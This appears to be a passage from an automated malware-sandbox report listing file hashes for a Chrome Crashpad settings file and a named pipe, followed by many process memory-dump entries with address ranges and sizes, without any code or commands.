                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                          Downloads

                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                            MD5

                                                                                                                                                                                            c2d7189ad501b3933f5b546034a5118e

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            1533e327f4a70a7e3d6d53ea3ec0793bbf679cc8

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            fbc1ea878e875e428730c4f8c543b6d1fe865df13b49a0de976b2e00db93997b

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            a7b579e6ba993665d290142a0dc529a58c79e58b4e43b37dc56bc8958bb823702bf3d14c693d72ce683cb42767cec18985032dc713a5a1218a47d0a5beffed0e

                                                                                                                                                                                          • \??\pipe\crashpad_4060_UZJFELHWYSHKNEBT
                                                                                                                                                                                            MD5

                                                                                                                                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                            SHA1

                                                                                                                                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                            SHA256

                                                                                                                                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                            SHA512

                                                                                                                                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                          • memory/200-244-0x0000000000F60000-0x0000000000F9A000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            232KB

                                                                                                                                                                                          • memory/200-245-0x0000000000FF0000-0x0000000001046000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            344KB

                                                                                                                                                                                          • memory/364-254-0x0000022262570000-0x00000222625D7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/520-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/604-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/960-286-0x00000000010B0000-0x00000000010B2000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            8KB

                                                                                                                                                                                          • memory/1060-303-0x00000144A4940000-0x00000144A49A7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1060-262-0x00000144A4290000-0x00000144A42F7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1120-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/1152-301-0x000002996E470000-0x000002996E4D7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1152-260-0x000002996D820000-0x000002996D887000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1164-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/1212-268-0x0000025699C30000-0x0000025699C97000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1356-270-0x000001CDAA770000-0x000001CDAA7D7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1424-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/1452-264-0x000001E17F400000-0x000001E17F467000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1452-305-0x000001E17F4E0000-0x000001E17F547000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1484-290-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/1824-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/1864-307-0x000001E7A8620000-0x000001E7A8687000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1864-266-0x000001E7A8540000-0x000001E7A85A7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/1872-287-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/2116-123-0x00007FFB01670000-0x00007FFB01671000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/2116-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2160-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2240-291-0x0000000005A10000-0x0000000005A11000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/2372-299-0x000002783C940000-0x000002783C9A7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2372-258-0x000002783C340000-0x000002783C3A7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2396-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2424-297-0x000001CCF54A0000-0x000001CCF5507000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2424-256-0x000001CCF4F40000-0x000001CCF4FA7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2456-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2700-272-0x00000148CEB00000-0x00000148CEB67000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2708-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2712-274-0x000001E3076D0000-0x000001E307737000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2788-250-0x000002BE32A70000-0x000002BE32AD7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2788-295-0x000002BE33010000-0x000002BE33077000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/2796-293-0x0000000005520000-0x0000000005B26000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            6.0MB

                                                                                                                                                                                          • memory/2804-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/2804-289-0x0000000004A30000-0x0000000004F2E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            5.0MB

                                                                                                                                                                                          • memory/2816-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3160-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3260-248-0x000001BBD5770000-0x000001BBD57D7000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/3260-246-0x000001BBD5580000-0x000001BBD55C4000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            272KB

                                                                                                                                                                                          • memory/3404-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3732-283-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            3.5MB

                                                                                                                                                                                          • memory/3832-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3840-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3984-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/3984-288-0x0000000005290000-0x0000000005291000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/3992-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4036-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4048-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4120-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4120-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4124-277-0x0000000000400000-0x00000000004B4000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            720KB

                                                                                                                                                                                          • memory/4124-276-0x00000000004C0000-0x000000000060A000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.3MB

                                                                                                                                                                                          • memory/4136-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4164-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4228-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4252-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4328-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4332-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4364-281-0x0000000003A50000-0x0000000003A97000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            284KB

                                                                                                                                                                                          • memory/4384-292-0x0000011A36AE0000-0x0000011A36B00000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            128KB

                                                                                                                                                                                          • memory/4384-284-0x0000011A36AC0000-0x0000011A36AE0000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            128KB

                                                                                                                                                                                          • memory/4384-282-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            7.0MB

                                                                                                                                                                                          • memory/4388-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4420-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4468-280-0x00000000004A0000-0x00000000004E4000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            272KB

                                                                                                                                                                                          • memory/4512-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4520-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4544-279-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            284KB

                                                                                                                                                                                          • memory/4624-278-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.6MB

                                                                                                                                                                                          • memory/4624-275-0x0000000004FB0000-0x0000000005107000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.3MB

                                                                                                                                                                                          • memory/4632-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4636-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4652-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4652-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4684-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4704-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4716-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4724-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4728-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4732-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4744-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4776-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4796-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4804-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4808-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4872-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4884-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4892-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4928-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4936-252-0x00000294DA000000-0x00000294DA067000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            412KB

                                                                                                                                                                                          • memory/4936-285-0x00000294DC400000-0x00000294DC505000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.0MB

                                                                                                                                                                                          • memory/4944-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4948-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4952-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4980-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4992-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5000-247-0x00000000023F0000-0x000000000258C000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            1.6MB

                                                                                                                                                                                          • memory/5004-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5028-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5040-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5048-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5052-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5100-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5108-219-0x0000000000000000-mapping.dmp